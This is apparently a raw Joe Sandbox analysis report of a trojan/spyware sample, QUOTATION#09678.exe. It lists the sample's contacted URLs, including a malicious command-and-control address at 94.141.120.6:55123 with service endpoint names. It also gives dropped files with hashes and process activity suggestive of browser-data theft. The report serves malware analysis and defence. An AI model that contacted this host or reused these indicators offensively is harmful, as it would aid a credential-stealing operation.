                        http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXInstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          http://tempuri.org/Endpoint/EnvironmentSettingsInstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2386917577.00000000030B0000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://api.ip.sb/geoip%USERPEnvironmentROFILE%QUOTATION#09678.exe, 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2385941630.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              		unknown
                              https://api.ip.sbInstallUtil.exe, 00000005.00000002.2386917577.00000000030B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://api.ip.sb/geoipInstallUtil.exe, 00000005.00000002.2386917577.00000000030B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://schemas.xmlsoap.org/soap/envelope/InstallUtil.exe, 00000005.00000002.2386917577.00000000030CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp819F.tmp.5.dr, tmp49EE.tmp.5.dr, tmp4A0F.tmp.5.dr, tmp49FE.tmp.5.dr, tmp814F.tmp.5.dr, tmpB88F.tmp.5.dr, tmpB87F.tmp.5.dr, tmp817E.tmp.5.dr, tmp4A40.tmp.5.dr, tmp4A20.tmp.5.dr, tmpB8AF.tmp.5.dr, tmpB8B0.tmp.5.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://tempuri.org/InstallUtil.exe, 00000005.00000002.2386917577.00000000031DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://upx.sf.netAmcache.hve.10.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://tempuri.org/Endpoint/CheckConnectInstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmp819F.tmp.5.dr, tmp49EE.tmp.5.dr, tmp4A0F.tmp.5.dr, tmp49FE.tmp.5.dr, tmp814F.tmp.5.dr, tmpB88F.tmp.5.dr, tmpB87F.tmp.5.dr, tmp817E.tmp.5.dr, tmp4A40.tmp.5.dr, tmp4A20.tmp.5.dr, tmpB8AF.tmp.5.dr, tmpB8B0.tmp.5.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.ecosia.org/newtab/tmp819F.tmp.5.dr, tmp49EE.tmp.5.dr, tmp4A0F.tmp.5.dr, tmp49FE.tmp.5.dr, tmp814F.tmp.5.dr, tmpB88F.tmp.5.dr, tmpB87F.tmp.5.dr, tmp817E.tmp.5.dr, tmp4A40.tmp.5.dr, tmp4A20.tmp.5.dr, tmpB8AF.tmp.5.dr, tmpB8B0.tmp.5.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://tempuri.org/Endpoint/VerifyUpdateResponseInstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://tempuri.org/Endpoint/SetEnvironmentInstallUtil.exe, 00000005.00000002.2386917577.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2386917577.00000000031DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://tempuri.org/Endpoint/SetEnvironmentResponseInstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://tempuri.org/Endpoint/GetUpdatesInstallUtil.exe, 00000005.00000002.2386917577.00000000031DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://ac.ecosia.org/autocomplete?q=tmp819F.tmp.5.dr, tmp49EE.tmp.5.dr, tmp4A0F.tmp.5.dr, tmp49FE.tmp.5.dr, tmp814F.tmp.5.dr, tmpB88F.tmp.5.dr, tmpB87F.tmp.5.dr, tmp817E.tmp.5.dr, tmp4A40.tmp.5.dr, tmp4A20.tmp.5.dr, tmpB8AF.tmp.5.dr, tmpB8B0.tmp.5.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://94.141.120.6:55123t-InstallUtil.exe, 00000005.00000002.2386917577.00000000031DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://94.141.120.6:55123InstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2386917577.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2386917577.00000000031DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://api.ipify.orgcookies//settinString.RemovegQUOTATION#09678.exe, 00000000.00000002.2268869258.000002CC91C21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2385941630.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2004/08/addressingInstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://tempuri.org/Endpoint/GetUpdatesResponseInstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmp819F.tmp.5.dr, tmp49EE.tmp.5.dr, tmp4A0F.tmp.5.dr, tmp49FE.tmp.5.dr, tmp814F.tmp.5.dr, tmpB88F.tmp.5.dr, tmpB87F.tmp.5.dr, tmp817E.tmp.5.dr, tmp4A40.tmp.5.dr, tmp4A20.tmp.5.dr, tmpB8AF.tmp.5.dr, tmpB8B0.tmp.5.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://tempuri.org/Endpoint/EnvironmentSettingsResponseInstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://tempuri.org/Endpoint/VerifyUpdateInstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://tempuri.org/0InstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp819F.tmp.5.dr, tmp49EE.tmp.5.dr, tmp4A0F.tmp.5.dr, tmp49FE.tmp.5.dr, tmp814F.tmp.5.dr, tmpB88F.tmp.5.dr, tmpB87F.tmp.5.dr, tmp817E.tmp.5.dr, tmp4A40.tmp.5.dr, tmp4A20.tmp.5.dr, tmpB8AF.tmp.5.dr, tmpB8B0.tmp.5.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/soap/actor/nextInstallUtil.exe, 00000005.00000002.2386917577.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            94.141.120.6
                                                            		unknownRussian Federation
                                                            		43429UNITLINE_RST_NET1RostovnaDonuRUtrue

                                                            General Information

                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1546607
                                                            Start date and time:2024-11-01 08:36:08 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 5m 7s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:15
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:QUOTATION#09678.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.expl.evad.winEXE@12/55@1/1
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 87%
                                                            • Number of executed functions: 34
                                                            • Number of non-executed functions: 3
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 104.26.13.31, 172.67.75.172, 104.26.12.31, 13.89.179.12
                                                            • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtSetInformationFile calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            03:37:00API Interceptor22x Sleep call for process: powershell.exe modified
                                                            03:37:08API Interceptor167x Sleep call for process: InstallUtil.exe modified
                                                            03:37:21API Interceptor1x Sleep call for process: WerFault.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            No context

                                                            Domains

                                                            No context

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            UNITLINE_RST_NET1RostovnaDonuRUhidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                            • 94.141.123.127
                                                            hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                            • 94.141.123.127
                                                            hidakibest.x86.elfGet hashmaliciousMirai, GafgytBrowse
                                                            • 94.141.123.127
                                                            hidakibest.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                            • 94.141.123.127
                                                            hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                            • 94.141.123.127
                                                            hidakibest.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                            • 94.141.123.127
                                                            hidakibest.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                            • 94.141.123.127
                                                            hidakibest.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                            • 94.141.123.127
                                                            hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                            • 94.141.123.127
                                                            fd5P4igezR.exeGet hashmaliciousStealcBrowse
                                                            • 94.141.122.159

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_QUOTATION#09678._f7e8cda497f49dbb58f08b576154eda73825fe_24f8ed17_c8c4fc4d-e9f8-4af6-abaf-2ae8e4f23469\Report.wer

                                                            Download File
                                                            Process:C:\Windows\System32\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):1.1608028789566174
                                                            Encrypted:false
                                                            SSDEEP:192:EeY6yRVjLu0UnUVaWBHp8SQOAdzuiFGZ24lO8iyn:y6AjhUnUVamHCewzuiFGY4lO8iE
                                                            MD5:36967E12668E84FC32C034B1194C10F2
                                                            SHA1:9A79E6BAC06315F74DD2BF3E480E2024D0BB3777
                                                            SHA-256:D62F298F65F5F7E19BCDE2F8E726351389ABC90AF42DC96F012308065138FF9A
                                                            SHA-512:DCA389D314951E90F0183F5E28C62657A323E3D2AECC2EF17E6D10F6CDE43B4E66F4A49AE5B3EB93B1F3BA50317D86F277768D269E641454CE01470FD42C00B9
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.9.2.0.2.1.9.0.9.9.5.6.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.9.2.0.2.2.0.0.5.2.6.9.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.8.c.4.f.c.4.d.-.e.9.f.8.-.4.a.f.6.-.a.b.a.f.-.2.a.e.8.e.4.f.2.3.4.6.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.8.6.c.d.6.f.-.b.9.a.1.-.4.a.1.7.-.9.8.f.d.-.7.e.b.7.f.a.4.7.e.3.9.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.Q.U.O.T.A.T.I.O.N.#.0.9.6.7.8...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.F.u.c.k.i.n.g.S.h.i.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.2.f.c.-.0.0.0.1.-.0.0.1.4.-.e.9.7.4.-.7.f.d.3.3.0.2.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.3.7.a.6.c.6.3.8.f.5.6.b.c.f.2.3.e.8.5.7.0.f.c.8.f.1.1.f.3.3.0.0.0.0.0.0.0.0.!.0.0.0.0.8.d.0.6.3.8.e.3.3.d.d.5.9.0.d.0.c.a.6.a.d.6.9.1.8.d.7.e.3.e.2.5.7.6.2.6.1.3.d.4.!.Q.U.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER9462.tmp.dmp

                                                            Download File
                                                            Process:C:\Windows\System32\WerFault.exe
                                                            File Type:Mini DuMP crash report, 16 streams, Fri Nov 1 07:36:59 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):470911
                                                            Entropy (8bit):3.249024640208639
                                                            Encrypted:false
                                                            SSDEEP:3072:i+WrdRXuLcSKkKXG/MH1CCqbvJkF9i3+v/fGJq0G4Cje54eUPRR:i+UdE/JKWsqbhV3Q/fGIlbjF
                                                            MD5:0A12F58330F68D448F371FC0C66A9F40
                                                            SHA1:4F56BEDBB1297EF8150F35F919EFEDB047D46E21
                                                            SHA-256:143A69E5E35D1869EE128DD1B8176BCC1731CDC29840C0BFDFD6B90EA47E0C23
                                                            SHA-512:10157198B77DC91758D50FA3C3CDAD72C331B0462BB37FC612013F44055E20CB16B33194BE6D08BB9470DFFD0BF4AB619B3A9D715CFFFE51460C06A4CB21707A
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:MDMP..a..... .........$g............t.......................$...p%...........%......4L.............l.......8...........T...........P8../...........xC..........dE..............................................................................eJ.......E......Lw......................T.............$g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER9703.tmp.WERInternalMetadata.xml

                                                            Download File
                                                            Process:C:\Windows\System32\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8618
                                                            Entropy (8bit):3.712792393828607
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJNEx6YEI1gudKGgmfl4eprX89bp0dfQDm:R6lXJux6YEKguhgmfl47pefJ
                                                            MD5:CDFEBF42014F032506CE261DAB49E4AC
                                                            SHA1:AAFA804FF69EAF40F5EF0DF8A2A1263769DC3598
                                                            SHA-256:35D27EAA28A38849073C2514DFCD7D81760500C83819ED5F78641F2C3E1A5B13
                                                            SHA-512:A6FDE683B74909D390F78A056A91130514C7AB1BCE3CC1FF4DC476BA20FAAE00BEF0008A7E028DB4E6D9ED068E31E26CFF6A89F1C0E28B2D0328EE2542B5BBC2
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.4.<./.P.i.d.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER9742.tmp.xml

                                                            Download File
                                                            Process:C:\Windows\System32\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4789
                                                            Entropy (8bit):4.55823529889686
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsiJg771I9VSWpW8VYqsYm8M4JhQp+FRyq859a1qw0w0hd:uIjfwI7Kz7VhpJhQEegqw0w0hd
                                                            MD5:054396C45365C618803C22DA6B393460
                                                            SHA1:1789354EE1BDC0A6CEAA5D58EC052FD97B72E750
                                                            SHA-256:7E9B92858627C2282B2B6189757528FECE767F12577F5C233219EED9C25C8296
                                                            SHA-512:6197697A8BDD3CEE2F03B43088A6BCA3C0108136B1A9E25E3635183CE0B663F0D7A3AB78A644BCD6A2968009E5A17715F2E0CF591828A138577E7717058631D0
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="568719" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.log

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2666
                                                            Entropy (8bit):5.345804351520589
                                                            Encrypted:false
                                                            SSDEEP:48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHjHKx1qHpHsLU:vq5qxqdqolqztYqh3oPtI6mq7qoT5DqO
                                                            MD5:99EF806358EC635615FCC973DA805A5D
                                                            SHA1:3D5E802B056A5CABB53707A30D60F9E8294CEC13
                                                            SHA-256:99957E097E6DB3573742EFD7B473D80998DE5AEF0E473D2C505EBBB1252E8285
                                                            SHA-512:7B340970383EB8685E2D3ADFE94E1B253DF7444ACA6EEA5859ED2DFFBCBCAFECE645961FF0C76E365EBA8ABF7A6444414E8D97363CC09BD34362E234DC51F21E
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):1.1940658735648508
                                                            Encrypted:false
                                                            SSDEEP:3:NlllulnmWllZ:NllUmWl
                                                            MD5:3EBBEC2F920D055DAC842B4FF84448FA
                                                            SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
                                                            SHA-256:32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
                                                            SHA-512:163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
                                                            Malicious:false
                                                            Preview:@...e................................................@..........

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xpgwqxv.fvz.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cl0uf5e1.v3l.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgvd3sxk.ceb.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yof40a4m.tmj.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\tmp121E.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmp121F.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
